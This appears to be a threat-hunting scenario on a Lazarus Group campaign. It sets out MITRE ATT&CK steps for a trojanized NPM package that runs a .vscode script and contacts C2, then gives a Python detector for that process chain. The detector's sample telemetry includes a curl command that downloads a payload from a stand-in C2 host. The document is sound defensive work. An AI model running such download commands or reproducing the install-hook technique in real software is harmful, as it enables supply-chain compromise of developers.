Threat Hunting Scenario: Lazarus Group’s Evolved Infection Chain

Lazarus group actors are actively targeting specific industries with tailored spearphishing attacks, utilizing trojanized remote access tools and a complex infection chain involving multiple malware stages and C2 communication for persistent access and data exfiltration.

Engage Report on new Lazarus malware

The Lazarus group targeted employees of a nuclear-related organization with phishing emails containing malicious archive files. The emails were disguised as job opportunities at prominent aerospace and defense companies, aiming to trick the victims into opening the malicious attachments.

Bored BeaverTail & InvisibleFerret Yacht Club – A Lazarus Lure

T1566.001 – The attacker sends a phishing email containing a malicious link to a GitHub repository disguised as a legitimate project.

T1133 – The attacker hosts malicious code, disguised as an NPM package, on a public GitHub repository.

T1059.003 – The victim, a developer, uses the npm install command to install the malicious NPM package from the GitHub repository.

T1543 – The malicious NPM package contains a script that executes a malicious JavaScript file (‘test.js’) located in the ‘.vscode’ folder, establishing persistence on the victim’s machine.

T1071.001 – The malicious JavaScript file uses the cURL command to communicate with the attacker’s C2 server over HTTP to download additional payloads.

T1041 – The attacker uses the established C2 channel to exfiltrate sensitive data from the victim’s machine.
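The six-step chain above (npm install pulling the package, the package launching a script under .vscode, that script calling cURL out to an HTTP C2) is a process-ancestry pattern a hunter can search for in endpoint telemetry. The following is an added example, not code from the original report: it walks a constructed list of process-creation events and flags a curl child of a node process whose command line names a .vscode script, provided an npm install is found among the node process's ancestors. The event schema (pid, ppid, image, cmdline), the regexes and the sample domain are assumptions.

```python
"""Hunt for the npm -> .vscode script -> curl-to-C2 chain (added example)."""
from dataclasses import dataclass
import re

@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable base name as logged by the endpoint sensor
    cmdline: str    # full command line

# Patterns are assumptions derived from the chain in the text, not IoCs from it.
VSCODE_SCRIPT = re.compile(r"\.vscode[\\/][\w.-]+\.js", re.IGNORECASE)
NPM_INSTALL = re.compile(r"\bnpm(\.cmd|\.exe)?\s+(i|install)\b", re.IGNORECASE)
HTTP_URL = re.compile(r"https?://\S+", re.IGNORECASE)

def find_chain(events, max_hops=3):
    """Return (npm_pid, node_pid, curl_pid) tuples for every matching chain."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if e.image.lower() not in ("curl", "curl.exe") or not HTTP_URL.search(e.cmdline):
            continue
        node = by_pid.get(e.ppid)
        if node is None or node.image.lower() not in ("node", "node.exe"):
            continue
        if not VSCODE_SCRIPT.search(node.cmdline):
            continue
        # npm usually runs lifecycle scripts via a shell, so allow a few hops up.
        anc, hops = by_pid.get(node.ppid), 0
        while anc is not None and hops < max_hops:
            if NPM_INSTALL.search(anc.cmdline):
                hits.append((anc.pid, node.pid, e.pid))
                break
            anc, hops = by_pid.get(anc.ppid), hops + 1
    return hits

# Constructed sample telemetry: one malicious chain plus benign node/curl noise.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "bash", "bash"),
    ProcEvent(101, 100, "node", "node /usr/local/bin/npm install"),
    ProcEvent(102, 101, "sh", "sh -c node .vscode/test.js"),
    ProcEvent(103, 102, "node", "node .vscode/test.js"),
    ProcEvent(104, 103, "curl", "curl -s http://c2.example.invalid/stage2 -o /tmp/.s"),
    ProcEvent(200, 1, "node", "node server.js"),
    ProcEvent(201, 200, "curl", "curl https://registry.npmjs.org/"),
    ProcEvent(300, 100, "curl", "curl http://example.com/"),
]

if __name__ == "__main__":
    for npm_pid, node_pid, curl_pid in find_chain(SAMPLE_EVENTS):
        print(f"chain: npm={npm_pid} -> node={node_pid} -> curl={curl_pid}")
```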

Lazarus Lure in Yacht Club

The Lazarus group is conducting a spearphishing campaign targeting individuals involved in the maritime industry, particularly yacht and luxury vessel sales, using malicious attachments to deliver malware.